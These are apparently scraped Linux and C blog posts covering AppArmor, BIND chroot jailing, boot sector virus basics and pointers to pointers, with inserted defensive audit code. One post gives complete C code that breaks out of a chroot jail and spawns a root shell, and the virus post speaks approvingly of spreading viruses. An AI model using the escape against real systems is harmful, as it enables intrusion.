<span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/bin/ping mixr,:</span> allows the application read and execute access to the file.</div>
</li>
</ul>
</div>
</div>
</div>
</span></span></pre>
</div>
</li>
</ul>
</div>
</div>
</div>
<br />
</div>
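The file-naming rule, the header flag and the two rule types described above can be pulled out of a profile mechanically, which helps when reviewing which profiles are still in complain mode. This is an added example, not part of the original post or of AppArmor's own tooling; the function names are made up for it, and the sample is the bin.ping profile shown above.

```shell
#!/bin/sh
# Added example: summarise an AppArmor profile by rule type.
# All function names are hypothetical helpers, not AppArmor tools.

# The bin.ping profile from this page, embedded so the script runs offline.
sample_profile() {
cat <<'EOF'
#include <tunables/global>
/bin/ping flags=(complain) {
  #include <abstractions/base>
  #include <abstractions/consoles>
  #include <abstractions/nameservice>
  capability net_raw,
  capability setuid,
  network inet raw,
  /bin/ping mixr,
  /etc/modules.conf r,
}
EOF
}

# Profile file name for an executable: drop the leading "/", turn the rest into ".".
profile_name_for() {
  printf '%s\n' "$1" | sed 's#^/##; s#/#.#g'
}

# Path of the confined program, taken from the header line (profile on stdin).
profile_target() {
  sed -n 's#^\(/[^[:space:]]*\)[[:space:]].*[{][[:space:]]*$#\1#p' | head -n 1
}

# Mode from the header (profile on stdin). In complain mode violations are
# logged but not blocked, so the rules below the header restrict nothing yet.
profile_mode() {
  if grep -Eq 'flags=\([^)]*complain[^)]*\)[[:space:]]*[{]'; then
    echo complain
  else
    echo enforce
  fi
}

# Capability entries: one capability name per line (profile on stdin).
profile_capabilities() {
  sed -n 's/^[[:space:]]*capability[[:space:]][[:space:]]*\([a-z_]*\),.*$/\1/p'
}

# Path entries: "path permissions" per line (profile on stdin).
profile_paths() {
  sed -n 's#^[[:space:]]*\(/[^[:space:]]*\)[[:space:]][[:space:]]*\([a-zA-Z]*\),[[:space:]]*$#\1 \2#p'
}

# True when the file is named after the program it confines.
profile_name_matches() {
  target=$(profile_target < "$1")
  [ "$(basename "$1")" = "$(profile_name_for "$target")" ]
}

# Print a short review summary for one profile file.
summarise_profile() {
  f=$1
  echo "target: $(profile_target < "$f")"
  echo "mode: $(profile_mode < "$f")"
  if profile_name_matches "$f"; then
    echo "file name: ok"
  else
    echo "file name: does not match target"
  fi
  profile_capabilities < "$f" | sed 's/^/capability: /'
  profile_paths < "$f" | sed 's/^/path: /'
}

# Demo on the constructed copy of the sample profile.
demo_dir=$(mktemp -d)
sample_profile > "$demo_dir/bin.ping"
summarise_profile "$demo_dir/bin.ping"
rm -rf "$demo_dir"
```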
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com1tag:blogger.com,1999:blog-6934113520237822184.post-70000866690826787262012-11-12T00:26:00.001-08:002012-11-12T00:30:59.759-08:00Virus Programming Tutorial-3<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: center;">
<b><span style="font-size: large;">Boot Sector Virus</span></b></div>
The boot sector virus can be the simplest or the most sophisticated of all computer viruses. On the one hand, the boot sector is always located in a very specific place on disk. Therefore, both the search and copy mechanisms can be extremely quick and simple, if the virus can be contained wholly within the boot sector.<br />
On the other hand, since the boot sector is the first code to gain control after the ROM startup code, it is very difficult to stop before it loads. If one writes a boot sector virus with sufficiently sophisticated anti-detection routines, it can also be very difficult to detect after it loads, making the virus nearly invincible.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdStqCZo6K5OeMZgZ-jYeT6N9SPx13qDCd20qd3NG4Hj1Y-byF7rwTbgMeWrcqi9G6pq4O9VNuzX-EhXdbGmrm4MOOMFFLCGXQwqJtv8wUAu9KzpkqttAyvjadl8mS0JmvogymF7UHYe33/s1600/boot-sector-virus.png" imageanchor="1"><img border="0" height="460" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdStqCZo6K5OeMZgZ-jYeT6N9SPx13qDCd20qd3NG4Hj1Y-byF7rwTbgMeWrcqi9G6pq4O9VNuzX-EhXdbGmrm4MOOMFFLCGXQwqJtv8wUAu9KzpkqttAyvjadl8mS0JmvogymF7UHYe33/s400/boot-sector-virus.png" width="640" /></a></div>
<br />
<br />
When a PC is first turned on, the CPU begins executing the machine language code at the location F000:FFF0. The system BIOS ROM (Basic-Input-Output-System Read-Only-Memory) is located in this high memory area, so it is the first code to be executed by the computer. This ROM code is written in assembly language and stored on chips (EPROMS) inside the computer. Typically this code will perform several functions necessary to get the computer up and running properly. First, it will check the hardware to see what kinds of devices are a part of the computer (e.g., color or mono monitor, number and type of disk drives) and it will see whether these devices are working correctly. The most familiar part of this startup code is the memory test, which cycles through all the memory in the machine twice, displaying the addresses on the screen. The startup code will also set up an interrupt table in the lowest 1024 bytes of memory. This table provides essential entry points (interrupt vectors) so all programs loaded later can access the BIOS services. The BIOS startup code also initializes a data area for the BIOS starting at the memory location 0040:0000H, right above the interrupt vector table. Once these various house-keeping chores are done, the BIOS is ready to transfer control to the operating system for the computer, which is stored on disk.<br />
<br />
//Sample Kilroy Virus Code<br />
DISP_MSG:<br />
MOV SI,OFFSET MESSAGE ;set offset of message up<br />
DM1: <br />
MOV AH,0EH ;Execute BIOS INT 10H, Fctn 0EH<br />
LODSB ;get character to display <br />
OR AL,AL<br />
JZ DM2 ;repeat until 0<br />
INT 10H ;Display it <br />
JMP SHORT DM1 ;and get another<br />
DM2: RET<br />
<br />
MESSAGE: DB 'Kilroy and #!sh@1 was here!' ,0DH,0AH,0AH,0 <br />
<br />
Besides displaying a message, the virus can be noticed as it searches for drives to infect, especially if you have a second floppy or drive. If your hard disk is infected, or if you have no hard disk, you will notice that the second floppy lights up for a second or two before your machine boots up.<br />
This is a pretty rudimentary virus. It can make mistakes when infecting the hard drive and miss the boot sector. It can only replicate when the machine boots up. And it can get stuck in places where it cannot replicate any further (for example, on a system with only one floppy disk and a hard disk). Still, it will do its job, and travel all around the world if you’re not careful with it.<br />
<br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-80028046955742006172012-11-09T11:19:00.000-08:002012-11-09T11:23:44.042-08:00Jail Bind-9 in Linux<div dir="ltr" style="text-align: left;" trbidi="on">
On Unix-like operating systems, such as Linux, a chroot jail is the
common expression used to describe a section of a filesystem that is
sectioned off for a particular user. On a web server, it is
particularly useful for the security of shared hosting accounts.<br />
Without a chroot jail, a user with limited file permissions would
still be able to navigate to top-level directories. As an example,
suppose the user’s directory is <b>/home/user</b>. Without
chroot, nothing would prevent the user from navigating up to /home to
see other users’ directories or even navigating up to <b>/</b> where they can see <b>/etc, /usr, /var, /lib</b><i>,</i>
and other system-critical directories. Although the user would not
have the permissions to edit them, they would be able to see the files
and target specific ones to try to exploit.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqSHwGsdfOu9tTjrOzNYndleOy-0TyvlUqKd4JDf443TLpTKDYw-8mdtH-0dMHzVEDQRKO6cva5bc8XNdgBW1xi16Hs-TA1FBiG7A9aG3iY5Dh1N9zp4R9_UN4CoKdNweppvxjIELsjotM/s1600/Apache-Chroot.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqSHwGsdfOu9tTjrOzNYndleOy-0TyvlUqKd4JDf443TLpTKDYw-8mdtH-0dMHzVEDQRKO6cva5bc8XNdgBW1xi16Hs-TA1FBiG7A9aG3iY5Dh1N9zp4R9_UN4CoKdNweppvxjIELsjotM/s400/Apache-Chroot.gif" width="400" /></a></div>
<br />
<br />
We can use the following steps to jail BIND on a Linux operating system. <br />
<br />
<b>1:</b> Create a jail path<br />
<b>mkdir -p /named/jail</b><br />
<b><br /></b>
<b>2:</b> Create the following directories inside the jail folder<br />
<b>mkdir -p /named/jail/etc<br />mkdir -p /named/jail/var </b><br />
<b>mkdir -p /named/jail/dev</b><br />
<b><br /></b>
<b>3:</b> Create the following device files inside /named/jail/dev (run these commands from that directory)<br />
<b>mknod null c 1 3<br />mknod zero c 1 5<br />mknod random c 1 8</b><br />
<br />
<b>4:</b> Edit the bind9 defaults file in /etc/default<br />
<b>gedit /etc/default/bind9</b><br />
<b></b><br />
<b>OPTIONS="-u bind -t /named/jail -c /named/jail/etc/bind/named.conf "</b><br />
<div>
<b><br /></b></div>
The OPTIONS line in this file contains three parameters.<br />
<b>-t:</b> jail path <br />
<b>-c</b>: configuration file<br />
<b>-u:</b> user<br />
<b><br /></b>
<b><br /></b>
<b>5:</b> Move the /etc/bind folder into /named/jail/etc<br />
<b>mv /etc/bind /named/jail/etc/bind</b><br />
<br />
<b>6:</b> Create a symbolic link to it in the /etc folder<br />
<b>ln -s /named/jail/etc/bind /etc/bind</b><br />
<br />
<b>7:</b> Use the following command to run bind in debugging mode.<br />
<b>named -g -d 9</b><br />
<br />
<b>8:</b> Now use nslookup or dig to check whether bind9 is working properly.<br />
<b>nslookup </b><br />
<b>>server host-ip-address </b>{IPv4 address of the host that is running the bind server}<br />
<b>>localhost </b>{domain name for which you want to find the IPv4 address}<br />
<br />
OR<br />
<br />
<b>dig @host-ip-address-of-bind-server domain-name</b><br />
Example: dig @192.168.56.139 eva.localhost<br />
<br />
/* Also change the paths used in named.conf and named.conf.local */</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-87164240492897818692012-10-19T20:02:00.002-07:002012-10-19T20:02:40.109-07:00How to break out of a jail in Linux <div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVXkJD0ieZpkA21UFx9gHVxSlRWIR0ftNw5xeScJLAtPHxQ9O8s-9cVLIAgLYbsfq5XPAdVEtWrVMfDSxyBdpNadktM4lijUl8EN5WFIEwISpmlAvlHyaQhuNrxobEQQrTA9dlQxC07Btv/s1600/jail-break.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVXkJD0ieZpkA21UFx9gHVxSlRWIR0ftNw5xeScJLAtPHxQ9O8s-9cVLIAgLYbsfq5XPAdVEtWrVMfDSxyBdpNadktM4lijUl8EN5WFIEwISpmlAvlHyaQhuNrxobEQQrTA9dlQxC07Btv/s400/jail-break.jpg" width="400" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<div style="background-color: white; text-align: -webkit-auto;">
<span style="font-family: Verdana, sans-serif;">Whilst <tt>chroot()</tt> is reasonably secure, a program can escape from its trap. So long as a program is run with <tt>root</tt> (<i>ie</i> UID <tt>0</tt>) privileges it can be used to break out of a <tt>chroot()</tt>ed area. For a user to do this, they would need access to:</span></div>
<div align="left" style="background-color: white;">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<blockquote>
<table border="0"><tbody>
<tr><td align="left" valign="top"></td><td align="left" valign="top"><ul>
<li><span style="font-family: Verdana, sans-serif;">C compiler or a Perl interpreter</span></li>
</ul>
</td></tr>
<tr><td align="left" valign="top"><span style="font-family: Verdana, sans-serif;"><br /></span></td><td align="left" valign="top"><ul>
<li><span style="font-family: Verdana, sans-serif;">Security holes to gain root access</span></li>
</ul>
</td></tr>
</tbody></table>
</blockquote>
</div>
<div style="background-color: white; text-align: -webkit-auto;">
<span style="font-family: Verdana, sans-serif;">It should be noted that this document was written with protecting web servers from rogue CGI scripts in mind. Therefore it is not unreasonable to assume that a user has access to a Perl interpreter. It is then a matter for the user to gain root access via security holes on the box running the web server. Whilst this is outside the topic of the document, an attacker could make use of application programs which are <tt>setuid</tt>-root and have security holes within them. In a well-maintained <tt>chroot()</tt> area such programs should not exist. However, it should be noted that maintaining a <tt>chroot()</tt>ed environment is a non-trivial task; for example, system patches which fix such security holes will not know about the copies of the programs within the <tt>chroot()</tt>ed area. Ensuring that there are no <tt>setuid</tt>-root executables within the padded cell is going to be a must.</span></div>
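The maintenance check called for above can be scripted, together with a check of the /named/jail layout built in the BIND post: the three directories, the three device nodes with the major/minor numbers passed to mknod, and any setuid or setgid file inside the jail. This is an added example, not code from the original posts; the function names are made up for it, it flags every setuid/setgid file rather than only root-owned ones, and it assumes GNU stat.

```shell
#!/bin/sh
# Added example: audit a chroot jail laid out like /named/jail on this page.
# Function names are hypothetical; stat -c assumes GNU coreutils.

# Report any of the jail's expected top-level directories that is missing.
audit_dirs() {
  jail=$1
  for d in etc var dev; do
    [ -d "$jail/$d" ] || echo "MISSING_DIR $d"
  done
}

# Each node must be a character device with the major:minor used with mknod:
# null 1 3, zero 1 5, random 1 8.
audit_devs() {
  jail=$1
  for spec in null:1:3 zero:1:5 random:1:8; do
    name=${spec%%:*}
    rest=${spec#*:}
    maj=${rest%%:*}
    min=${rest#*:}
    node="$jail/dev/$name"
    if [ ! -c "$node" ]; then
      echo "BAD_DEV $name missing or not a character device"
      continue
    fi
    got=$(stat -c '%t:%T' "$node")          # hex major:minor of the node
    want=$(printf '%x:%x' "$maj" "$min")
    [ "$got" = "$want" ] || echo "BAD_DEV $name is $got, expected $want"
  done
}

# List setuid/setgid regular files inside the jail. Copies placed here are not
# updated by system patches, so anything listed needs a reason to exist.
audit_setuid() {
  find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print | sed 's/^/SETID /'
}

# Run all checks; print findings and return 1 if there are any.
audit_jail() {
  jail=$1
  findings=$( { audit_dirs "$jail"; audit_devs "$jail"; audit_setuid "$jail"; } 2>/dev/null )
  if [ -n "$findings" ]; then
    printf '%s\n' "$findings"
    return 1
  fi
  echo "OK $jail"
}

# Demo on a constructed jail: no dev directory, one setuid file left behind.
demo_jail=$(mktemp -d)
mkdir -p "$demo_jail/etc" "$demo_jail/var"
: > "$demo_jail/etc/leftover"
chmod 4755 "$demo_jail/etc/leftover"
audit_jail "$demo_jail"
rm -rf "$demo_jail"
```

On a real system run it as `audit_jail /named/jail` with enough privilege to read the whole tree.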
<div style="background-color: white; text-align: -webkit-auto;">
<span style="font-family: Verdana, sans-serif;">To break out of a <tt>chroot()</tt>ed area, a program should do the following:</span></div>
<blockquote style="background-color: white; text-align: -webkit-auto;">
<div align="left">
<br />
<ol>
<li><span style="background-color: white; font-family: Verdana, sans-serif; text-align: -webkit-auto;">Create a temporary directory in its current working directory</span></li>
<li><span style="background-color: transparent;"> </span><span style="background-color: white; font-family: Verdana, sans-serif; text-align: -webkit-auto;">Open the current working directory. Only required if chroot() changes the calling program's working directory.</span></li>
<li><span style="background-color: transparent;"> </span><span style="background-color: white; font-family: Verdana, sans-serif; text-align: -webkit-auto;">Change the root directory of the process to the temporary directory using chroot().</span></li>
<li><span style="background-color: transparent;"> </span><span style="background-color: white; font-family: Verdana, sans-serif; text-align: -webkit-auto;">Use fchdir() with the file descriptor of the opened directory to move the current working directory outside the chroot()ed area. Only required if chroot() changes the calling program's working directory.</span></li>
<li><span style="background-color: transparent;"> </span><span style="background-color: white; font-family: Verdana, sans-serif; text-align: -webkit-auto;">Perform chdir("..") calls many times to move the current working directory into the real root directory.</span></li>
<li><span style="background-color: transparent;"> </span><span style="background-color: white; font-family: Verdana, sans-serif; text-align: -webkit-auto;">Change the root directory of the process to the current working directory, the real root directory, using chroot(".")</span></li>
</ol>
</div>
</blockquote>
<br />
Sample code in C:<br />
<br />
<div align="center" style="background-color: white;">
<b>Breaking <tt>chroot()</tt></b><br />
<pre style="text-align: left;">#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

/*
** You should set NEED_FCHDIR to 1 if the chroot() on your
** system changes the working directory of the calling
** process to the same directory as the process was chroot()ed
** to.
**
** It is known that you do not need to set this value if you
** are running on Solaris 2.7 and below.
**
*/
#define NEED_FCHDIR 0

#define TEMP_DIR "waterbuffalo"

/* Break out of a chroot() environment in C */

int main() {
    int x;            /* Used to move up a directory tree */
#if NEED_FCHDIR
    int dir_fd;       /* File descriptor to directory */
#endif
    struct stat sbuf; /* The stat() buffer */

    /*
    ** First we create the temporary directory if it doesn't exist
    */
    if (stat(TEMP_DIR,&sbuf)<0) {
        if (errno==ENOENT) {
            if (mkdir(TEMP_DIR,0755)<0) {
                fprintf(stderr,"Failed to create %s - %s\n", TEMP_DIR,
                        strerror(errno));
                exit(1);
            }
        } else {
            fprintf(stderr,"Failed to stat %s - %s\n", TEMP_DIR,
                    strerror(errno));
            exit(1);
        }
    } else if (!S_ISDIR(sbuf.st_mode)) {
        fprintf(stderr,"Error - %s is not a directory!\n",TEMP_DIR);
        exit(1);
    }

#if NEED_FCHDIR
    /*
    ** Now we open the current working directory
    **
    ** Note: Only required if chroot() changes the calling program's
    **       working directory to the directory given to chroot().
    **
    */
    if ((dir_fd=open(".",O_RDONLY))<0) {
        fprintf(stderr,"Failed to open \".\" for reading - %s\n",
                strerror(errno));
        exit(1);
    }
#endif

    /*
    ** Next we chroot() to the temporary directory
    */
    if (chroot(TEMP_DIR)<0) {
        fprintf(stderr,"Failed to chroot to %s - %s\n",TEMP_DIR,
                strerror(errno));
        exit(1);
    }

#if NEED_FCHDIR
    /*
    ** Partially break out of the chroot by doing an fchdir()
    **
    ** This only partially breaks out of the chroot() since whilst
    ** our current working directory is outside of the chroot() jail,
    ** our root directory is still within it. Thus anything which refers
    ** to "/" will refer to files under the chroot() point.
    **
    ** Note: Only required if chroot() changes the calling program's
    **       working directory to the directory given to chroot().
    **
    */
    if (fchdir(dir_fd)<0) {
        fprintf(stderr,"Failed to fchdir - %s\n",
                strerror(errno));
        exit(1);
    }
    close(dir_fd);
#endif

    /*
    ** Completely break out of the chroot by recursing up the directory
    ** tree and doing a chroot to the current working directory (which will
    ** be the real "/" at that point). We just do a chdir("..") lots of
    ** times (1024 times for luck :). If we hit the real root directory before
    ** we have finished the loop below it doesn't matter as .. in the root
    ** directory is the same as . in the root.
    **
    ** We do the final break out by doing a chroot(".") which sets the root
    ** directory to the current working directory - at this point the real
    ** root directory.
    */
    for(x=0;x<1024;x++) {
        chdir("..");
    }
    chroot(".");

    /*
    ** We're finally out - so exec a shell in interactive mode
    */
    if (execl("/bin/sh","-i",NULL)<0) {
        fprintf(stderr,"Failed to exec - %s\n",strerror(errno));
        exit(1);
    }
}
</pre>
</div>
<br />
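<div style="text-align: -webkit-auto;">
The break-out above depends on two things the jailed process was left with: root privilege (needed to call <tt>chroot()</tt> a second time) and a working directory or open directory descriptor outside the new root. As an added example, not part of the original post, this is one way a service can enter a jail without leaving either behind; the function names <tt>close_directory_fds</tt> and <tt>enter_jail</tt> and the uid/gid arguments are assumptions made for illustration.</div>

```c
/* Added example (not from the original post): hardened chroot() entry.
 * close_directory_fds() and enter_jail() are hypothetical names. */
#define _DEFAULT_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Close every open descriptor >= first_fd that refers to a directory and
 * return how many were closed. A directory descriptor opened before
 * chroot() still refers to a location outside the jail afterwards, and
 * fchdir() on it is step 4 of the break-out described in the post.
 */
int close_directory_fds(int first_fd)
{
    long max_fd = sysconf(_SC_OPEN_MAX);
    int closed = 0;
    struct stat sb;

    if (max_fd < 0 || max_fd > 65536)
        max_fd = 65536;      /* bound the scan if the limit is unknown or huge */
    for (int fd = first_fd; fd < max_fd; fd++) {
        if (fstat(fd, &sb) == 0 && S_ISDIR(sb.st_mode)) {
            close(fd);
            closed++;
        }
    }
    return closed;
}

/*
 * Enter the jail and give up root for good.
 * Returns 0 on success, -1 with errno set on any failure; the caller
 * should exit on failure rather than keep running half-confined.
 */
int enter_jail(const char *jail, uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0) {      /* "dropping" to root drops nothing */
        errno = EINVAL;
        return -1;
    }
    /* Move the working directory first, then the root, then cd to the
     * new "/": the cwd is never left outside the jail. */
    if (chdir(jail) != 0 || chroot(".") != 0 || chdir("/") != 0)
        return -1;
    close_directory_fds(3);
    /* Order matters: supplementary groups and gid go while still root. */
    if (setgroups(0, NULL) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    /* Verify the drop is permanent: regaining root and a second chroot()
     * (step 3 of the break-out) must both be refused now. */
    if (setuid(0) == 0 || chroot("/") == 0) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "usage: %s <jail-dir> <uid> <gid>\n", argv[0]);
        return 2;
    }
    if (enter_jail(argv[1], (uid_t)strtoul(argv[2], NULL, 10),
                   (gid_t)strtoul(argv[3], NULL, 10)) != 0) {
        fprintf(stderr, "refusing to continue: %s\n", strerror(errno));
        return 1;
    }
    puts("jailed and unprivileged");
    return 0;
}
```

<div style="text-align: -webkit-auto;">
Run unprivileged, <tt>enter_jail()</tt> fails at <tt>chroot()</tt> with <tt>EPERM</tt>, which is the same refusal a correctly jailed, non-root process gets when it attempts the second <tt>chroot()</tt>.</div>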
<div style="text-align: -webkit-auto;">
<span style="font-size: xx-small;">References: <a href="http://www.bpfh.net/" target="_blank">http://www.bpfh.net/</a></span></div>
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-51562203964946098812012-10-14T21:50:00.001-07:002012-10-14T21:56:56.004-07:00Using Pointers to Pointers In C<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="text-align: -webkit-auto;"><span style="font-family: Arial, Helvetica, sans-serif;">Let's try to understand the importance of pointers to pointers with the help of an example. </span></span><span style="font-family: Arial, Helvetica, sans-serif; text-align: -webkit-auto;">Suppose we're trying to write some code to delete a given integer from a list. The straightforward solution looks like this:</span><br />
<pre style="text-align: -webkit-auto;"><span style="font-family: Arial, Helvetica, sans-serif;">    /* delete node containing i from the list pointed to by list */
    struct list *lp, *prevlp = NULL;
    for(lp = list; lp != NULL; lp = lp->next)
    {
        if(lp->item == i)
        {
            if(lp == list)
                list = lp->next;
            else
                prevlp->next = lp->next;
            break;
        }
        prevlp = lp;    /* remember the node just behind lp */
    }
</span></pre>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="text-align: -webkit-auto;">This code works, but it has two blemishes. One is that it has to use an extra variable to keep track of the node one behind the one it's looking at, and the other is that it has to use an extra test to special-case the situation in which the node being deleted is at the head of the list. Both of these problems arise because the deletion of a node from the list involves modifying the previous pointer to point to the next node (that is, the node before the deleted node to point to the one following). But, depending on whether the node being deleted is the first node in the list or not, the pointer that needs modifying is either the pointer that points to the head of the list, or the </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointer in the previous node.</span></span><br />
<div style="text-align: -webkit-auto;">
<span style="font-family: Arial, Helvetica, sans-serif;">To illustrate this, suppose that we have the list (1, 2, 3) and we're trying to delete the element 1. After we've found the element 1, <tt>lp</tt> points to its node, which just happens to be the same node that the main <tt>list</tt> pointer points to, as illustrated in (a) below: </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1adc5FoofSlY1T9h8H1ClGqybQgc0hfbGA0KSl2jGYwnTj2mh9npKlRT2Iri62dGv-o4iV_0GS2p24mjDZTKKqKnBMrkjYB5aSk8KJrOxSzq9huEkWEOrL0q4ZzE3h0Gs6CroUtJsCAFA/s1600/fig22.4.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1adc5FoofSlY1T9h8H1ClGqybQgc0hfbGA0KSl2jGYwnTj2mh9npKlRT2Iri62dGv-o4iV_0GS2p24mjDZTKKqKnBMrkjYB5aSk8KJrOxSzq9huEkWEOrL0q4ZzE3h0Gs6CroUtJsCAFA/s1600/fig22.4.gif" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br style="text-align: -webkit-auto;" /><span style="text-align: -webkit-auto;">To remove element 1 from the list, then, we must adjust the main </span><tt style="text-align: -webkit-auto;">list</tt><span style="text-align: -webkit-auto;"> pointer so that it points to 2's node, the new head of the list (as shown in (b)). If we were trying to delete node 2, on the other hand (as illustrated in (c) above), we'd have to adjust node 1's </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointer to point to 3. The </span><tt style="text-align: -webkit-auto;">prevlp</tt><span style="text-align: -webkit-auto;"> pointer keeps track of the previous node we were looking at, since (at other than the first node in the list) that's the node whose </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointer will need adjusting. (Notice that if we were to delete node 3, we would copy its </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointer over to 2, but since 3's </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointer is the null pointer, copying it to node 2 would make node 2 the end of the list, as desired.)</span></span><br />
<div style="text-align: -webkit-auto;">
<span style="font-family: Arial, Helvetica, sans-serif;">We can write another version of the list-deletion code, which is (in some ways, at least) much cleaner, by using a <em>pointer to a pointer</em> to a <tt>struct list</tt>. This pointer will point at the pointer which points at the node we're looking at; it will either point at the head pointer or at the <tt>next</tt> pointer of the node we looked at last time. Since this pointer points at the pointer that points at the node we're looking at (got that?), it points at the pointer which we need to modify if the node we're looking at is the node we're deleting. Let's see how the code looks:</span></div>
<pre style="text-align: -webkit-auto;"><span style="font-family: Arial, Helvetica, sans-serif;">    struct list **lpp;
    for(lpp = &list; *lpp != NULL; lpp = &(*lpp)->next)
    {
        if((*lpp)->item == i)
        {
            /* splice the node out by rewriting the pointer that led to it */
            *lpp = (*lpp)->next;
            break;
        }
    }
</span></pre>
<span style="text-align: -webkit-auto;"><span style="font-family: Arial, Helvetica, sans-serif;">That single line</span></span><br />
<pre style="text-align: -webkit-auto;"><span style="font-family: Arial, Helvetica, sans-serif;"> *lpp = (*lpp)->next;
</span></pre>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="text-align: -webkit-auto;">updates the correct pointer, to splice the node it refers to out of the list, regardless of whether the pointer being updated is the head pointer or one of the </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointers. (Of course, the payoff is not absolute, because the use of a pointer to a pointer to a </span><tt style="text-align: -webkit-auto;">struct list</tt><span style="text-align: -webkit-auto;"> leads to an algorithm which might not be nearly as obvious at first glance.)</span></span><br />
<div style="text-align: -webkit-auto;">
<span style="font-family: Arial, Helvetica, sans-serif;">To illustrate the use of the pointer-to-pointer <tt>lpp</tt> graphically, here are two more figures illustrating the situation just before deleting node 1 (on the left) or node 2 (on the right). </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRY9X5Z-nlZ9yoxvr3iiigWAXEPVGJ2d5oEEdyNyyBRwfFbx2nNfgZ-YJSFsoEy-h3-w5VjUtmR52soH5ZbBL8lAHjtqMzoYBhpqjMaY2zdskOSLbvaXuZmNugMyTx_TebrxOTK50i0vVw/s1600/fig22.5.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRY9X5Z-nlZ9yoxvr3iiigWAXEPVGJ2d5oEEdyNyyBRwfFbx2nNfgZ-YJSFsoEy-h3-w5VjUtmR52soH5ZbBL8lAHjtqMzoYBhpqjMaY2zdskOSLbvaXuZmNugMyTx_TebrxOTK50i0vVw/s1600/fig22.5.gif" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br style="text-align: -webkit-auto;" /><span style="text-align: -webkit-auto;">In both cases, </span><tt style="text-align: -webkit-auto;">lpp</tt><span style="text-align: -webkit-auto;"> points at a </span><tt style="text-align: -webkit-auto;">struct list</tt><span style="text-align: -webkit-auto;"> pointer which points at the node to be deleted. In both cases, the pointer pointed to by </span><tt style="text-align: -webkit-auto;">lpp</tt><span style="text-align: -webkit-auto;"> (that is, the pointer </span><tt style="text-align: -webkit-auto;">*lpp</tt><span style="text-align: -webkit-auto;">) is the pointer that needs to be updated. In both cases, the new pointer (the pointer that </span><tt style="text-align: -webkit-auto;">*lpp</tt><span style="text-align: -webkit-auto;"> is to be updated </span><em style="text-align: -webkit-auto;">to</em><span style="text-align: -webkit-auto;">) is the </span><tt style="text-align: -webkit-auto;">next</tt><span style="text-align: -webkit-auto;"> pointer of the node being deleted, which is always </span><tt style="text-align: -webkit-auto;">(*lpp)->next</tt><span style="text-align: -webkit-auto;">.</span></span><br />
<div style="text-align: -webkit-auto;">
<span style="font-family: Arial, Helvetica, sans-serif;">One other aspect of the code deserves mention. The expression</span></div>
<pre style="text-align: -webkit-auto;"><span style="font-family: Arial, Helvetica, sans-serif;"> (*lpp)->next
</span></pre>
